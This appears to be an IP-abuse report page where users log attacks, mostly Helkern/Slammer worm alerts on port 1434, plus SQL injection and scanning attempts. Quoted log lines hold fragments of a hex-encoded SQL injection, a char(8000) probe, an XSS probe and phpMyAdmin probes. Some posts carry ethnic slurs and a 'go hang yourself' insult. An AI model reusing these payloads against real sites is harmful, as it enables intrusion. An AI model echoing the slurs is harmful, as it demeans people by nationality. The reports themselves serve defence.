Desde esta direccion Sí realizo Una intrusión Win.MSSQLworm.Heldern , Que Me hizó formatear mi computador , El PROTOCOLO / Servicio es UDP en puerto local 1434 A Las 12 47 El Día de Hoy ....

This will not work because I'm using a secure version of wordpress, but his sql injection attempts just piss me off because they've been going on for the past 2 hours....

SQL version overflow attempt UDP SQL version overflow attempt Attempted Administrator Privilege Gain 122.225.100.154:3411->88.116.105.150:1434 07/19-15:48:19 CET...

SQL version overflow attempt...

Attempted SQL script injection....

who is this bastard with his worms and should inject his worms in his ass :P~~~~...

211.139.255.29 <-- this is the ip address and this chinese person is solely rotten to its core. he only has to destruct the pc hack the admin passwords, steal credit cards and moch more. this guy shud...

61.128.110.96 ...

28.06.2010 14:03:27 Gefunden: Intrusion.Win.MSSQL.worm.Helkern UDP von 86.105.220.79 auf lokalen Port 1434 Nicht vorhanden...

6/19/2010 Detected: Intrusion.Win.MSSQL.worm.Helkern Absent UDP from 61.128.110.96 to local port 1434...

Attempting to Dos/DDos attack on MSSQL...

Intrusion.Win.MSSQL.worm.Helkern UDP desde 60.161.78.155 al puerto local 1434...

dEcLaRe%20@s%20vArChAr(8000)%20sEt%20@s=0x6445634C615265204074207641724368417228323535292C406320764172436841722832353529206445634C615265207441624C655F637572736F5220635572536F5220466F522073456C45635420...

This from the IIS logs: 2010-06-07 13:02:51 W3SVC3820959 xxxx aa.bb.cc.dd GET /Page.aspx ID=103';dEcLaRe%20@s%20vArChAr(8000)%20sEt% 20@s=0x6445634C615265204074207641724368417228323535292C406320...

6/3/2010 10:07:35 AM UDP from 218.30.22.82 to local port 1434 Detected: Intrusion.Win.MSSQL.worm.Helkern ...

5/27/2010 7:45:04 AM UDP from 122.225.100.154 to local port 1434 Detected: Intrusion.Win.MSSQL.worm.Helkern ...

5/27/2010 10:42:17 AM UDP from 221.130.140.18 to local port 1434 Detected: Intrusion.Win.MSSQL.worm.Helkern ...

5/27/2010 8:57:51 PM UDP from 67.241.88.147 to local port 1434 Detected: Intrusion.Win.MSSQL.worm.Helkern ...

5/31/2010 10:52:03 AM UDP from 61.233.103.25 to local port 1434 Detected: Intrusion.Win.MSSQL.worm.Helkern...

6/1/2010 8:24:27 AM UDP from 122.225.100.154 to local port 1434 Detected: Intrusion.Win.MSSQL.worm.Helkern...

6/2/2010 7:46:27 AM UDP from 219.149.194.245 to local port 1434 Detected: Intrusion.Win.MSSQL.worm.Helkern...

6/2/2010 7:46:27 AM UDP from 219.149.194.245 to local port 1434 Detected: Intrusion.Win.MSSQL.worm.Helkern...

[ spam net handler ] Socket UDP (bind) 0.0.0.0:57885 -> 0.0.0.0:1434 DialogueFactory mssql Dialogue Factory creates dialogues for the MS02-061 flaw removing Dialogue MSSQLDialogue as Dialogue retur...

/config.inc.php?p=phpinfo() seems like discussed in CVE-2009-1151. Sorry i don't speak fluent english and computer skill very low. ...

26.5.2010. 22:19:27 UDP from 221.130.140.18 to local port 1434 Absent...

Attacker traced to Buenos Aires, Argentina. Attacker\'s computer was spoofed....

Attacker traced to Buenos Aires, Argentina. Attacker\'s computer was spoofed....

i keep getting alerts from my kaspersky anti virus about some type of intrusion from the ip address 211.143.230.140...

2010/05/25 23:08:11 PM Detected: Intrusion.Win.MSSQL.worm.Helkern Absent UDP from 61.128.110.96 to local port 1434...

23/05/2010 21:48:10 Network Attack Blocker Detected: Intrusion.Win.MSSQL.worm.Helkern Absent UDP from 60.161.78.155 to local port 1434 ...

Another oldie char(8000) attack: paged=45'%20And%20char(124)%2b(Select%20Cast(Count(1)%20as%20varchar(8000))%2Bchar(124)%20From%20[sysobjects]%20Where%201=1)>0%20and%20''=' Within 2 seconds, th...

Another oldie char(8000) attack: cat=4&paged=41\'%20And%20char(124)%2b(Select%20Cast(Count(1)%20as%20varchar(8000))%2Bchar(124)%20From%20[sysobjects]%20Where%201=1)>0%20and%20\'\'=\' Within 2 se...

Another oldie char(8000) attack: amp;paged=41&cat=4\'%20And%20char(124)%2b(Select%20Cast(Count(1)%20as%20varchar(8000))%2Bchar(124)%20From%20[sysobjects]%20Where%201=1)>0%20and%20\'\'=\' Within...

Attempt to inject on p 1434...

stupid hacker. don't you have anything better to do? Like go hang yourself or something?...

Try SQL Injection Attack to Wordpress....

WORM ATTACK FROM THIS IP AND SEVERAL FROM INFECTED CHINA.......

My kaspersky detected this suspicious intrusion attempt from IP 218.30.22.82 Recently my email id got compromised, and I have recieving a lot of spam and phishing related email. He is constantly on a...

block by kaspersky...

==29000000============================== Request: 109.98.9.51 80.154.35.144 - - [10/May/2010:17:04:46 +0300] \\\"GET /phpmyadmin/sql.php?db=mysql&sql_query= HTTP/1.0\\\" 404 453 \\\"-\\\" \\\"-\\\" -...

Our security systems reports the 1st of May 2010 multiple attacks type SQL Injection from IP 115.49.49.48 to our web site. All attacks was performed on port 80. From 19:20:13 CEST with the first str...

Yet another attempt on 1434...

I am constantly getting Helkern notifications from this IP. Is there any way to ban this IP from attacking me?...

Attempted to load Helkern worm across port 1434...

Watch out for this IP that appears to come from Vancouver in Canada is bad news, try to block it...compromised as a new index.php file was downloaded and used to inject malware onto the site from th...

Watch out for this IP that appears to come from Vancouver in Canada is bad news, try to block it...compromised as a new index.php file was downloaded and used to inject malware onto the site from th...

Watch out for this IP that appears to come from Vancouver in Canada is bad news, try to block it...compromised as a new index.php file was downloaded and used to inject malware onto the site from th...

Tried to upload the helkern worm to my network via p 1434...

Tried to attack across port 1434...

Attack on port 1434...

My firewall tends to popup with this alerts. It happening from past dayz....

with \"Intrusion.WinMSSQL.worm.Helkern\"....

Attacked twice on p 1434...

Attempted to load the Helkern worm across p 1434...

Attempted to load via port 1434...

On March 30, 2010 at 12:08am PST my security sentry detected a series of 3 consecutive attempts to extract the ADMIN PW from a MySQL database. I'm using a Wordpress 2.9 installation (self-hosted on a ...

Port 1434 6 attempts in the last 24 hours...

port 1434 8 attempts to load lastnight...

Tried to inject via port 1434 again...

Slammer worm across p 1434...

Block this ip address dangerouse could cuase infection on pc...

Block this ip address dangerouse could cuase infection on pc...

3/16/2010 2:15:32 AM Detected: Intrusion.Win.MSSQL.worm.Helkern Absent UDP from 218.30.22.82 to local port 1434...

2 attempts across p 1434...

4 attempts lastnight to access port 1434...

Half dozen attempts over the past 2 days on port 1434...

2010-03-08 14:07:06 DoS MS-SQL Slammer Worm 218.30.22.82...

2010-03-08 14:07:06 DoS MS-SQL Slammer Worm 218.30.22.82...

The offender attempted to insert spammy text into a SQL database. \'john.young@ukonline.co.uk\' , \'alina\' , \'alina\' , \' , \' , \' , \' , \' , \' , \'1\' , \'MBVRHTCMRFd\' , \' prednisone 3...

Attempt to use the helkern MSQL worm across 1434 lastnight on 12 different attempts...

04.03.2010 13:59:00 Gefunden: Intrusion.Win.MSSQL.worm.Helkern UDP von 222.86.62.237 auf lokalen Port 1434 Nicht vorhanden...

04.03.2010 13:59:00 Gefunden: Intrusion.Win.MSSQL.worm.Helkern UDP von 222.86.62.237 auf lokalen Port 1434 Nicht vorhanden...

04.03.2010 13:59:00 Gefunden: Intrusion.Win.MSSQL.worm.Helkern UDP von 222.86.62.237 auf lokalen Port 1434 Nicht vorhanden ...

network attack.win.mssql.worm.helkern port 1434 ...

Tried to load Helkern SQL worm on p 1434...

Attempted to infect w/ Helkern Worm on p 1434...

28.02.2010 21:39:38 Gefunden: Intrusion.Win.MSSQL.worm.Helkern UDP von 219.153.62.89 auf lokalen Port 1434 Nicht vorhanden...

28.02.2010 21:39:38 Gefunden: Intrusion.Win.MSSQL.worm.Helkern UDP von 219.153.62.89 auf lokalen Port 1434 Nicht vorhanden ...

28.02.2010 20:57:02 Gefunden: Helkern UDP von 218.30.22.82 auf lokalen Port 1434 Nicht vorhanden...

28.02.2010 15:30:09 Gefunden: Intrusion.Win.MSSQL.worm.Helkern UDP von 222.179.5.106 auf lokalen Port 1434 Nicht vorhanden...

28.02.2010 15:30:09 Gefunden: Intrusion.Win.MSSQL.worm.Helkern UDP von 222.179.5.106 auf lokalen Port 1434 Nicht vorhanden...

27.02.2010 12:51:14 Gefunden: Intrusion.Win.MSSQL.worm.Helkern UDP von 219.149.53.239 auf lokalen Port 1434 Nicht vorhanden...

Tries to access database without permission...

26.02.2010 08:21:04 Gefunden: Intrusion.Win.MSSQL.worm.Helkern UDP von 122.225.100.154 auf lokalen Port 1434 Nicht vorhanden ...

9 attempts in the past 6 hours...

Several attempts last night across p 1434...

24.02.2010 08:25:59 Gefunden: Intrusion.Win.MSSQL.worm.Helkern UDP von 124.173.184.18 auf lokalen Port 1434 Nicht vorhanden...

Attempted Administrator Privilege Gain...

Attempts to access database using web publishing as a vector...

2/1/2010 8:12:16 PM Detected: Intrusion.Win.MSSQL.worm.Helkern UDP from 60.190.49.245 to local port 1434 i don't know specifically what kind of network attak it is but i am sure this is related to ...

Try it inject Query String: \"><script>alert(\'struts_sa_surl_xss.nasl\')</script>...

16.02.2010 01:32:06 Gefunden: Intrusion.Win.MSSQL.worm.Helkern UDP von 219.149.53.239 auf lokalen Port 1434 Nicht vorhanden...

16.02.2010 01:32:06 Gefunden: Intrusion.Win.MSSQL.worm.Helkern UDP von 219.149.53.239 auf lokalen Port 1434 Nicht vorhanden...

15.02.2010 11:24:31 Gefunden: Intrusion.Win.MSSQL.worm.Helkern UDP von 222.173.147.28 auf lokalen Port 1434 Nicht vorhanden...

15.02.2010 11:24:31 Gefunden: Intrusion.Win.MSSQL.worm.Helkern UDP von 222.173.147.28 auf lokalen Port 1434 Nicht vorhanden...

13.02.2010 18:45:18 Gefunden: Intrusion.Win.MSSQL.worm.Helkern UDP von 68.81.112.154 auf lokalen Port 1434 Nicht vorhanden...

13.02.2010 18:45:18 Gefunden: Intrusion.Win.MSSQL.worm.Helkern UDP von 68.81.112.154 auf lokalen Port 1434 Nicht vorhanden ...

2 Attempts to contact through 1434...

On 11/02/2010 0:59:09 my Kaspersky Detected: Intrusion.Win.MSSQL.worm.Helkern UDP from 19.149.53.239. ...

Again on 1434 4 tries in the past hour...

10.02.2010 18:31:49 Gefunden: Intrusion.Win.MSSQL.worm.Helkern UDP von 61.160.234.5 auf lokalen Port 1434 Nicht vorhanden...

Keep on keepin' on ...

GEO Location for 10.02.2010 00:18:40 Gefunden: Intrusion.Win.MSSQL.worm.Helkern UDP von 218.75.95.244 auf lokalen Port 1434 Nicht vorhanden ...

212.42.230.141 - \"GET /phpmyadmin//config/config.inc.php?d=echo%20%6D%65%72%67%65 HTTP/1.1\" \"Mozilla/4.0 Opera 7.01 [en]\"...

09.02.2010 07:58:21 Gefunden: Intrusion.Win.MSSQL.worm.Helkern UDP von 61.240.240.50 auf lokalen Port 1434 Nicht vorhanden ...

on port 1434...

Intrusion.Win.MSSQL.worm.Helkern...

08.02.2010 08:25:47 Gefunden: Intrusion.Win.MSSQL.worm.Helkern UDP von 219.149.53.239 auf lokalen Port 1434 Nicht vorhanden ...

05.02.2010 12:08:45 Gefunden: Intrusion.Win.MSSQL.worm.Helkern UDP von 41.205.158.135 auf lokalen Port 1434 Nicht vorhanden ...

04.02.2010 09:41:47 Gefunden: Intrusion.Win.MSSQL.worm.Helkern UDP von 172.191.102.17 auf lokalen Port 1434 Nicht vorhanden...

04.02.2010 09:41:47 Gefunden: Intrusion.Win.MSSQL.worm.Helkern UDP von 212.252.124.15 auf lokalen Port 1434 Nicht vorhanden...

04.02.2010 09:41:47 Gefunden: Intrusion.Win.MSSQL.worm.Helkern UDP von 212.252.124.15 auf lokalen Port 1434 Nicht vorhanden ...

218.23.37.51 60:190:49:245 two attacks for me same thing with me , some chinese from hefei.how to get rid of that basterd...is there anyway ?...

My Kaspersky Internet Security Suite reported an attack from 218.75.95.244 site in China to local port 1434. Attacks are repeated from time to time from this address belonging to Jinhua Telecom Co.ltd...

This guy has been attacking my computer and blocked by Kaspersky. ...

30.01.2010 16:00:43 Gefunden: Intrusion.Win.MSSQL.worm.Helkern UDP von 122.225.100.154 auf lokalen Port 1434 Nicht vorhanden...

30.01.2010 16:00:43 Gefunden: Intrusion.Win.MSSQL.worm.Helkern UDP von 122.225.100.154 auf lokalen Port 1434 Nicht vorhanden ...

Attack Time: 2:59:28 PM Attaker IP Address: 188.92.75.244 Injection Type: Post Variable More Details Information: Form Variables _Your_Name = rabHoolerag _Email = fsdvxbvcjhd1@gawab.com _Mail...

network attack Intrusion.win.MSSQL.worm.Helkern on port 1434...

network attack Intrusion.win.MSSQL.worm.Helkern on port 1434...

28.01.2010 12:09:36 Gefunden: Intrusion.Win.MSSQL.worm.Helkern UDP von 219.149.53.239 auf lokalen Port 1434 Nicht vorhanden...

28.01.2010 11:28:15 Gefunden: Intrusion.Win.MSSQL.worm.Helkern UDP von 60.191.131.138 auf lokalen Port 1434 Nicht vorhanden ...

28.01.2010 11:14:28 Gefunden: Intrusion.Win.MSSQL.worm.Helkern UDP von 122.225.100.154 auf lokalen Port 1434 Nicht vorhanden ...

Intrusion.Win.MSSQL.worm.Helkern 5 attempts in the past 4 hours...

2 computers keep being hit by fake antivirus.I use malwarebytes and it keeps blocking multiple chinese ips,roughly 40 different some in yamen some in europe,3 in africa.ive been hit 3 times in 6 month...

25 page hits in 2 minutes sql injecting attempt...

26.01.2010 11:32:49 Gefunden: Intrusion.Win.MSSQL.worm.Helkern UDP von 122.225.100.154 auf lokalen Port 1434 Nicht vorhanden ...

26.01.2010 08:26:06 Gefunden: Intrusion.Win.MSSQL.worm.Helkern UDP von 212.252.124.15 auf lokalen Port 1434 Nicht vorhanden ...

25.01.2010 11:24:11 Gefunden: Intrusion.Win.MSSQL.worm.Helkern UDP von 218.75.95.244 auf lokalen Port 1434 Nicht vorhanden...

25.01.2010 10:36:53 Gefunden: Intrusion.Win.MSSQL.worm.Helkern UDP von 61.152.188.110 auf lokalen Port 1434 Nicht vorhanden ...

Intrusion.Win.MSSQL.worm.Helkern Kaspersky reports network attack Intrusion.Win.MSSQL.worm.Helkern ip address: 219.149.53.239 ...

23.01.2010 21:31:28 Gefunden: Intrusion.Win.MSSQL.worm.Helkern UDP von 218.75.61.30 auf lokalen Port 1434 Nicht vorhanden ...

Looking for mysql, dbadmin, phpMyAdmin, mysql, db, config, pma, myadmin, intl, p. Time range from Jan 22 14:06:40 2010 to Jan 22 14:42:46 2010 EST....

22.01.2010 19:28:46 Gefunden: Intrusion.Win.MSSQL.worm.Helkern UDP von 219.149.53.239 auf lokalen Port 1434 Nicht vorhanden...

22.01.2010 12:44:18 Gefunden: Intrusion.Win.MSSQL.worm.Helkern UDP von 122.225.100.154 auf lokalen Port 1434 Nicht vorhanden ...

22.01.2010 10:46:22 Gefunden: Intrusion.Win.MSSQL.worm.Helkern UDP von 212.252.124.15 auf lokalen Port 1434 Nicht vorhanden ...

22.01.2010 10:17:24 Gefunden: Intrusion.Win.MSSQL.worm.Helkern UDP von 218.75.95.244 auf lokalen Port 1434 Nicht vorhanden ...

Attack detected. Intrusion.Win.MSSQL.worm.Helkern UDP local port 1434 212.252.124.15 it seem to be like a mobile phone. No any open ports can be found with. Nmap gives Device type: phon...

20.01.2010 09:43:48 Gefunden: Intrusion.Win.MSSQL.worm.Helkern Nicht vorhanden UDP von 218.23.37.51 auf lokalen Port 1434 ...

19.01.2010 11:24:41 Gefunden: Intrusion.Win.MSSQL.worm.Helkern UDP von 218.204.137.156 auf lokalen Port 1434 Nicht vorhanden ...

19.01.2010 09:01:24 Gefunden: Intrusion.Win.MSSQL.worm.Helkern UDP von 218.30.22.82 auf lokalen Port 1434 Nicht vorhanden...

Kaspersky blocked attempt from ip address 218.23.37.51 to inject Intrusion.Win.MSSQL.worm.Helkern through my port UDP 1434 ...

1/18/2010 7:55:29 PM Detected: Intrusion.Win.MSSQL.worm.Helkern Absent UDP from 218.75.95.244 to local port 1434 ...

Kaspersky blocked attempt from ip address 219.149.53.239 to inject Intrusion.Win.MSSQL.worm.Helkern through my port UDP 1434 my local UDP port 1434 has been previously attacked from 218.23.37.51 a...

18.01.2010 22:36:38 Gefunden: Intrusion.Win.MSSQL.worm.Helkern UDP von 218.75.95.244 auf lokalen Port 1434 Nicht vorhanden...

18.01.2010 22:29:18 Gefunden: Intrusion.Win.MSSQL.worm.Helkern UDP von 218.204.137.156 auf lokalen Port 1434 Nicht vorhanden ...

16.01.2010 13:08:54 Gefunden: Intrusion.Win.MSSQL.worm.Helkern UDP von 212.252.124.15 auf lokalen Port 1434 Nicht vorhanden...

16.01.2010 13:08:54 Gefunden: Intrusion.Win.MSSQL.worm.Helkern UDP von 212.252.124.15 auf lokalen Port 1434 Nicht vorhanden...

TCP Packet - Source:119.147.24.83,6000 Destination:90.136.144.60,1433...

UDP Packet - Source:60.190.49.243,56981 Destination:90.136.144.60,1434...

UDP Packet - Source:124.173.184.18,4861 Destination:90.136.144.60,1434...

15.01.2010 07:09:28 Gefunden: Intrusion.Win.MSSQL.worm.Helkern UDP von 210.109.111.187 auf lokalen Port 1434 Nicht vorhanden ...

13/01/2010 18:47:04 Intrusion.Win.MSSQL.worm.Helkern 200.142.96.106 UDP 1434...

13.01.2010 12:11:06 Gefunden: Intrusion.Win.MSSQL.worm.Helkern UDP von 212.252.124.15 auf lokalen Port 1434 Nicht vorhanden...

13.01.2010 07:42:23 Gefunden: Intrusion.Win.MSSQL.worm.Helkern UDP von 60.190.49.243 auf lokalen Port 1434 Nicht vorhanden ...

Intrusion.Win.MSSQL.worm.Helkern UDP von 218.200.186.20 auf lokalen Port 1434 Nicht vorhanden...

Attempted intrusion. UDP from 58.209.15.253 to port 1434. Kaspersky shows it as Detected: Intrusion.win.MSSQL.worm.Helkern I've been getting a good number of these from various Chinese addresses f...

06.01.2010 19:28:10 Gefunden: Intrusion.Win.MSSQL.worm.Helkern UDP von 211.100.229.252 auf lokalen Port 1434 Nicht vorhanden...

06.01.2010 19:28:10 Gefunden: Intrusion.Win.MSSQL.worm.Helkern UDP von 211.100.229.252 auf lokalen Port 1434 Nicht vorhanden...

06.01.2010 19:28:10 Gefunden: Intrusion.Win.MSSQL.worm.Helkern UDP von 211.100.229.252 auf lokalen Port 1434 Nicht vorhanden...

06.01.2010 01:05:18 Gefunden: Intrusion.Win.MSSQL.worm.Helkern UDP von 219.149.53.239 auf lokalen Port 1434 Nicht vorhanden ...

04.01.2010 19:10:09 Gefunden: Intrusion.Win.MSSQL.worm.Helkern UDP von 113.107.3.94 auf lokalen Port 1434 Nicht vorhanden...

04.01.2010 23:49:44 Gefunden: Intrusion.Win.MSSQL.worm.Helkern UDP von 211.154.136.196 auf lokalen Port 1434 Nicht vorhanden ...

Thank You Kaspersky for the protection again....

30.12.2009 19:34:54 Gefunden: Intrusion.Win.MSSQL.worm.Helkern UDP von 61.132.132.162 auf lokalen Port 1434 Nicht vorhanden...

Above intrusion detected by Norton and blocked....

This Ukraine IP tried 9 times attempting to do some SQL injection into my wordpress account. I think he was trying to guess which plugin or wordpress itself has security flaws....

28.12.2009 06:35:00 Gefunden: Intrusion.Win.MSSQL.worm.Helkern UDP von 122.225.100.154 auf lokalen Port 1434 Nicht vorhanden ...

28.12.2009 08:27:20 Gefunden: Intrusion.Win.MSSQL.worm.Helkern UDP von 218.204.137.156 auf lokalen Port 1434 Nicht vorhanden...

228.12.2009 07:25:59 Gefunden: Intrusion.Win.MSSQL.worm.Helkern UDP von 212.252.124.15 auf lokalen Port 1434 Nicht vorhanden ...

28.12.2009 19:35:50 Gefunden: Intrusion.Win.MSSQL.worm.Helkern UDP von 109.86.206.10 auf lokalen Port 1434 Nicht vorhanden...

28.12.2009 19:35:50 Gefunden: Intrusion.Win.MSSQL.worm.Helkern UDP von 109.86.206.10 auf lokalen Port 1434 Nicht vorhanden...

28.12.2009 06:35:00 Gefunden: Intrusion.Win.MSSQL.worm.Helkern UDP von 122.225.100.154 auf lokalen Port 1434 Nicht vorhanden...

when i'm navigating on internet, my kaspersky Internet security antivirus block this ip 219.149.53.239 and alert Intrusion.Win.MSSQL.worm.Hellkern...

this one tried to inject some kind of worm into my system my firewall blocked it saying that ip address is possibly spoofed!!! please help it is the 15th time i got this sttack from this ip ...

26.12.2009 13:44:06 Gefunden: Intrusion.Win.MSSQL.worm.Helkern UDP von 219.149.53.239 auf lokalen Port 1434 Nicht vorhanden ...

25.12.2009 22:17:45 Gefunden: Intrusion.Win.MSSQL.worm.Helkern UDP von 219.149.53.239 auf lokalen Port 1434 Nicht vorhanden...

25.12.2009 22:17:45 Gefunden: Intrusion.Win.MSSQL.worm.Helkern UDP von 219.149.53.239 auf lokalen Port 1434 Nicht vorhanden...

25.12.2009 22:17:45 Gefunden: Intrusion.Win.MSSQL.worm.Helkern UDP von 219.149.53.239 auf lokalen Port 1434 Nicht vorhanden...

24.12.2009 22:28:38 Gefunden: Intrusion.Win.MSSQL.worm.Helkern UDP von 218.204.137.156 auf lokalen Port 1434 Nicht vorhanden...

trying to hacking...

trying to hacking ........

trying to hacking ......

trying to hacking ......

trying to hacking ......

trying to hacking ......

Intrusion.Win.MSSQL.worm.Helkern from 190.2.29.193 UDP on local port 1434 Absent......

21.12.2009 18:57:21 Found: Intrusion.Win.MSSQL.worm.Helkern from 190.2.29.193 UDP on local port 1434 Absent......

21.12.2009 18:57:21 Found: Intrusion.Win.MSSQL.worm.Helkern from 190.2.29.193 UDP on local port 1434 Absent...

21.12.2009 18:57:21 Found: Intrusion.Win.MSSQL.worm.Helkern from 190.2.29.193 UDP on local port 1434 Absent...

21.12.2009 18:57:21 Found: Intrusion.Win.MSSQL.worm.Helkern from 190.2.29.193 UDP on local port 1434 Absent...

Above intrusion attempted, picked up by Norton....

GEO Location for 20.12.2009 12:01:01 Gefunden: Intrusion.Win.MSSQL.worm.Helkern UDP von 218.22.244.45 auf lokalen Port 1434 Nicht vorhanden ...

I was the last person to report this IP, and I took of KIS to defragment my hard drive. Bad Idea. I immediately got a Stop Error from a MSSQL Error. Is there any way to block this IP?...

trying to hacking...

trying to hacking ...

Win.MSSQL.worm...

Registered as attacked and blocked on Norton. Title block describes specific transgression....

Win.MSSQL.worm...

Win.MSSQL.worm...

Win.MSSQL.worm...

Win.MSSQL.worm...

Win.MSSQL.worm...

Win.MSSQL.worm...

2.2009 14:07:53 Gefunden: Intrusion.Win.MSSQL.worm.Helkern UDP von 219.149.53.239...

2.2009 14:07:53 Gefunden: Intrusion.Win.MSSQL.worm.Helkern UDP von 219.149.53.239...

Kaspersky report "IntrusionWin.MSSQL.worm.Helkern"...

Intrusion.Win.MSSQL.worm.Helkern Absent UDP from 211.100.229.252 to local port 1434...

12/15/2009 Detected: Intrusion.Win.MSSQL.worm.Helkern Absent UDP from 218.204.137.156 to local port 1434 ...

port 1434...

Intrusion.Win.MSSQL.worm.Helkern UDP...

Every half hour, Kapersky alerts me of this worm attemption to get inside of my network. intrusion.win.MYSQL.worm.Helkern 212.252.124.15 UDP 1434...

I get multiple intrusion alerts on Norton from this and multiple other IP addresses (almost exclusively different areas in China)....

Intrusion.Win.MSSQL.worm.Helkern...

Intrusion.Win.MSSQL...

Intrusion.Win.MSSQL.worm.Helkern...

Intrusion.Win.MSSQL.worm.Helkern ...

Intrusion.Win.MSSQL.worm.Helkern Nicht...

11/23/2009 1:17:52 PM 91.213.121.24 /Historiker/wp-admin/index.php 302 0 B [ Unknown ] + 00:00:12 91.213.121.24 /Historiker/wp-admin/post.php 302 0 B [ Unknown ] + 00:00:13 91.213.121.24 /Hist...

I\\\\\\\'ve got a message from the oSCE organisation, a news bulletin and when I opened it there was my Kaspersky Internet Security telling that the Win 32 MSSQL. Helkern worm was sent with it....

I\\\'ve got a message from the oSCE organisation, a news bulletin and when I opened it there was my Kaspersky Internet Security telling that the Win 32 MSSQL. Helkern worm was sent with it....

Kasper-sky Detected: Intrusion.Win.MSSQL.worm.Helkern On 2009/11/16 10:03:19 PM UDP from 190.2.29.193 to local port 1434 On 2009/11/16 1:37:48 AM UDP from 111.171.127.139 to local port 1434 ...

Kaspersky Internet Security -Attack blocked the above Intrusion attempt...

He is dodsing me and hacking my computers and sql injected attempts....

He is dodsing me and hacking my computers and sql injected attempts. ...

08-11-2009 5:01:14 Intrusion.Win.MSSQL.worm.Helkern! Attacker IP address: 212.252.124.15. Protocol/service: UDP on local port 1434. Time: 08-11-2009 5:01:14...

This IP has tried to infect our site with malware through a SQL injection. They created a bogus login and then attempted to gain access. We log all logins, and found this out. WWW.teamdonatelife.com...

This IP has tried to infect our site with malware through a SQL injection. They created a bogus login and then attempted to gain access. We log all logins, and found this out. WWW.teamdonatelife.com...

This guy has made numerious attempts to intrude our systems...

received log in kaspersky stating this attacker from UDP port 1434...

several times a day this type of network attack is shown on kaspersky from the china region just like others are experiencing on here....

This hacker has attacked my PC constantly for the past few months with a MySQL worm of some sorts....

the ip mentioned above is constantly attcaking computers in india .......... it is an attack mentioned as udp attack w32.sql.helkern attack..............

9/28/2009 4:22:45 PM UDP from 122.225.100.154 to local port 1434 Absent Detected: Intrusion.Win.MSSQL.worm.Helkern...

Tried accessing my Network at home. Intrusion. 2009/09/19 07:02:56 PM Intrusion.Win.MSSQL.worm.Helkern 61.145.123.141 UDP 1434 ...

By SQL injection inserting hate messages...

Source IP Address 218.204.137.156 The IP address of the computer that sent the packet which caused the alert. Source Port 1066 The port used by the source computer when sending the packe...

Source IP Address 218.204.137.156 The IP address of the computer that sent the packet which caused the alert. Source Port 1066 The port used by the source computer when sending the packe...

08/17,18/2009 Intrusion.Win.MSSQL.worm.Helkern 202.101.180.165 & 58.42.234.135 UDP 1434...

http://www.wantsfly.com/prx.php shows in my access log but wantsfly is definately not my domain...

http://www.wantsfly.com/prx.php shows in my access log but wantsfly is definately not my domain...

Intrusion.Win.MSSQL.worm.Helkern...

I don\'t know what this is, or what it wants from me, but it keep doing \'\'attacks\'\'. This is a quite popular hacker(just search Helkern on google) I need more information about this, so please hel...

22/07/2009 12:04:22 AM UDP from 218.206.139.152 to local port 1434 Absent Detected: Intrusion.Win.MSSQL.worm.Helkern ...

Had a bot from the same isp scan my network a day prior. It detected my Xampp package and another bot tried to execute SQLi against its MySQL feature. ...

During past week we detected in one of our sites several attacks from this IP: - Several SQL injection attempts, most of them with "hand made" look. - Variable scanning - Brute force attacks to the...

UDP from 202.99.11.99 to local port 1434 Absent Detected: Intrusion.Win.MSSQL.worm.Helkern ...

I\'m happy very good site...

ip address :222.82.249.235. this ip address is contstantly trying to hack my system and it crashes my computer can you please look into this thanks...

this is an intrusive worm operate by a hacker to try gain control from a machine, my advise is get a good firewall, encrypt your machine, and a good anti-virus updated every day, to prevent this kind ...

this is an intrusive worm operate by a hacker to try gain control from a machine, my advise is get a good firewall, encrypt your machine, and a good anti-virus updated every day, to prevent this kind ...

this is an intrusive worm operate by a hacker to try gain control from a machine, my advise is get a good firewall, encrypt your machine, and a good anti-virus updated every day, to prevent this kind ...

Detected: Intrusion.Win.MSSQL.worm.Helkern Detected: Intrusion.Win.MSSQL.worm.Helkern Absent UDP from 211.99.122.18 to local port 1434. This is the message given by Kaspersky Internet Security-networ...

Detected: Intrusion.Win.MSSQL.worm.Helkern Detected: Intrusion.Win.MSSQL.worm.Helkern Absent UDP from 202.99.11.99 to local port 1434. This is the message given by Kaspersky Internet Security-network...

This IP is trying to spam the comment area of my site....

The IP, along with at least three others, is trying to post comment on one of my servers. The comments contains links to trojans infested sites and other nasty stuff. I have blocked them in my firewal...

The IP, along with at least three others, is trying to post comment on one of my servers. The comments contains links to trojans infested sites and other nasty stuff. I have blocked them in my firewal...

The IP, along with at least three others, is trying to post comment on one of my servers. The comments contains links to trojans infested sites and other nasty stuff. I have blocked them in my firewal...

network intruion.win.MSSQL.hienken.worm this is attacking my computer...

5/20/2009 03:56 UDP from 202.99.11.99 to local port 1434 Absent Detected: Intrusion.Win.MSSQL.worm.Helkern ...

This guy registered on my forum just to spam links about how to download photoshop and autocad programs illegally. He was banned.......

Best Site Good Work...

DoS MS-SQL Slammer Worm...

DoS MS-SQL Slammer Worm attempt here at 2009-04-13 11:58:30...

Tried 38 times per second to hack my internal MS-Sql-server on port 1433...

Intrusion.Win.MSSQL.worm.Helkern UDP 1434. is there any people can stop this guy and all of the friend?. i\\\'ll be glad n very tanks to the people who can stop this ipaddress : 218.75.199.50 and al...

Tried to connect on port 1434...

Starting 01.27.09 till now with a frequency of about 3 to 5 days I get blocked incoming for this source on 1434....

intrustion.win.mmsql.worm.helken. yup this is it........

24/02/2009 01:52:37 Intrusion.Win.MSSQL.worm.Helkern! Attacker's IP address: 58.20.154.23. Protocol/service: UDP on local port 1434. Time: 24/02/2009 01:52:37 ...

23/02/2009 23:11:20 Intrusion.Win.MSSQL.worm.Helkern! Attacker\'s IP address: 61.177.196.226. Protocol/service: UDP on local port 1434. Time: 23/02/2009 23:11:20...

219.139.130.139 pls.. block it up block it...

16/04/2008 15:41:49 Intrusion.Win.MSSQL.worm.Helkern! Attacker's IP address: 220.165.8.32. Protocol/service: UDP on local port 1434. Time: 16/04/2008 15:41:49...

Intrusion.Win.MSSQL.worm.Helkern AbsentUDP from 117.103.192.49 to local port 1434...

Protocol - UDP Port - 1434 Intrusion.Win.MSSQL.Worm.Helkern Detected by AntiHacker System...

Protocol - UDP Port - 1434 Intrusion.Win.MSSQL.Worm.Helkern Detected by AntiHacker System...

Intrusion.Win.MSSQL.worm.Helkern...

Kaspersky Internet Security found on 11/19/2008 6:07:30 PM, UDP from 202.99.11.99 to local port 1434 Absent Detected: Intrusion.Win.MSSQL.worm.Helkern...

We have seen multiple SQL injection attacks coming from that IP address. they are trying to attack our web site by adding SQL code to the url and trying to retrieve table structures and usernames. ...

KIS 2009 report on 11/19/2008 11:09:49 PM UDP from 61.139.54.94 to local port 1434 Absent Detected: Intrusion.Win.MSSQL.worm.Helkern ...

